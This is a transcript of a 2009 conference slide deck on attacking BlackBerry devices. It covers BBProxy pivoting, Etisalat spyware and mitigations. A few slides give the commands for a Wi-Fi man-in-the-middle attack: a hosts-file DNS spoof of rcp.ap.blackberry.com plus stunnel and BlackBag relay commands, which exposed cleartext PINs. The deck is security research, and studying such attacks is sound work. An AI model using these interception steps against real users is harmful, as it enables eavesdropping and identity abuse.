Attacking Blackberry For Phun and Profit
40
Attacking BlackBerry for phun and profit y3dips[et]echo.or.id Sunday, November 8, 2009
-
Upload
ammar-wk -
Category
Technology
-
view
1.870 -
download
1
Transcript of Attacking Blackberry For Phun and Profit
Attacking BlackBerryfor phun and profit
y3dips[et]echo.or.id
Sunday, November 8, 2009
y3dips
• A Bandwidth Hunter ... A Renegade
• IT Security fans for more than 7 year
• http://google.com/search?q=y3dips
Sunday, November 8, 2009
BlackBerry
• Push Email
• Wireless Messaging System
• Phone, SMS, Cameras, Browsing
Sunday, November 8, 2009
• Photos
• Emails
• Sms
• Phone log
• Contact
BlackBerry
Sunday, November 8, 2009
BlackBerry
• BlackBerry Enterprise Server (BES)
• BlackBerry Internet Service (BIS)
Sunday, November 8, 2009
Diagram
http://smartphone.nttdocomo.co.jp/english/blackberrybold/blackberryservice/img/index/dgm_diagram.gif
Sunday, November 8, 2009
BB Proxy
• Attack BES network
• Defcon 2006 presented by Jesse D’aguanno
• Making a Blackberry Device as a gateway to internal Network
Sunday, November 8, 2009
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB UserApps ServerServer
Firewall
Sunday, November 8, 2009
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB User
Firewall
Apps ServerServer
Connecting into Attacker Computer
Sunday, November 8, 2009
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB UserApps ServerServer
Connecting into Attacker Computer
Connecting into App Server
Firewall
Sunday, November 8, 2009
Attacking Anatomy
INTERNET
INTERNAL LAN
Attacker
BB UserApps ServerServer
Connecting into App Server
Connecting into Attacker Computer
Attacker 0wned Internal Network
Device as a proxy
Firewall
Sunday, November 8, 2009
Our Approach
• Attacking Wifi Network
• DNS Spoofing
• Ssl Tunneling - http://stunnel.org
• BlackBag - http://matasano.com
Sunday, November 8, 2009
DNS Spoofing
• Spoof dns entry into router/dns server# echo “133.7.133.7 rcp.ap.blackberry.com” >> /etc/hosts
Sunday, November 8, 2009
DNS Spoofing
Sunday, November 8, 2009
Stunnel
• Setup 2 SSL connection
• SSL Connection from BB device to Attacker machine
• SSL Connection from Attacker machine to BB Real Server
Sunday, November 8, 2009
Stunnel
# stunnel -d 443 -r localhost:8888
# stunnel -c -d 8889 -r 216.9.240.88:443
• Setup 2 SSL connection
Sunday, November 8, 2009
BlackBag
• Glue the tunnel back
# bkb replug -b localhost:8889@8888
Sunday, November 8, 2009
BlackBag
Sunday, November 8, 2009
Attacking Anatomy
RIM Network
DNS Server
WIFI
rcp.ap.blackberry.com216.9.240.88
search rcp.ap.blackberry.com
Attacker - 133.7.133.7
Sunday, November 8, 2009
Attacking Anatomy
RIM Network
DNS Server
Attacker - 133.7.133.7
WIFI
rcp.ap.blackberry.com216.9.240.88
search rcp.ap.blackberry.com
rcp.ap.blackberry.com133.7.133.7
Sunday, November 8, 2009
Attacking Anatomy
RIM Network
Tcp/8888Tcp/443
Tcp/8889
Tcp/443
DNS Server
WIFI
rcp.ap.blackberry.com133.7.133.7
rcp.ap.blackberry.com216.9.240.88
search rcp.ap.blackberry.com
Attacker - 133.7.133.7
Sunday, November 8, 2009
Viewable
Sunday, November 8, 2009
Viewable
Sunday, November 8, 2009
Result
Sunday, November 8, 2009
Result
• Clear Text Sender PIN
• Clear Text Recipient PIN
• Clear Text Message type
• Encrypted Data
Sunday, November 8, 2009
Impact
• Spam? until DDOS
• PIN abuse; such as cloning
• Blackmail; identity thief, logs
• Email and PIN Mapping
Sunday, November 8, 2009
Next
• More Data to analyze (different type)
• Attack the Encryption?
• Another Infrastructur attacking Scenario
Sunday, November 8, 2009
Confession
Sunday, November 8, 2009
Raw Data
Sunday, November 8, 2009
Mal(Spy)ware
• The Most Famous Etisalat Issue
• Firmware Update
• Reverse by some researcher
• 100% Spyware
Sunday, November 8, 2009
Mal(Spy)ware
Sunday, November 8, 2009
POC
• Provided by Sheran Gunasekera @HITB 2009
• Bugs - Forwarding Emails
• PhoneSnoop - Turn your BB into Spy devices
• http://chirashi.zensay.com
Sunday, November 8, 2009
Bugs
Sunday, November 8, 2009
Summary
• 0wned a blackberry with $20 (USD)
• Social Engineering rulez!
• BlackBerry User awareness
Sunday, November 8, 2009
Case Stories
Sunday, November 8, 2009
Case Stories
Sunday, November 8, 2009
Case Stories
Sunday, November 8, 2009
Mitigation
• Password Your Device
• Turn On Firewall
• Encrypt your Data/Media Card
• Controlling downloded application
• Protecting GPS location
• Connect to Legitimate Wifi Network
Sunday, November 8, 2009
References
• Attack Surface Analysis of Blackberry Devices - symantec
• BlackBerry: Call to Arms, some provided - Ftr & FX of Phenoelit
• BlackJaking:0wning the Enterprise via BlackBerry - x30n
• Bugs & Kissess: Spying on Blackberry User for Fun - Sheran Gunasekera
• Seberapa Amankah Infrastruktur WIFI Blackberry device anda - y3dips & chopstick
Sunday, November 8, 2009
Greetz
• Hermis Consulting
• Sheran Gunasekera
• Info Komputer
Sunday, November 8, 2009
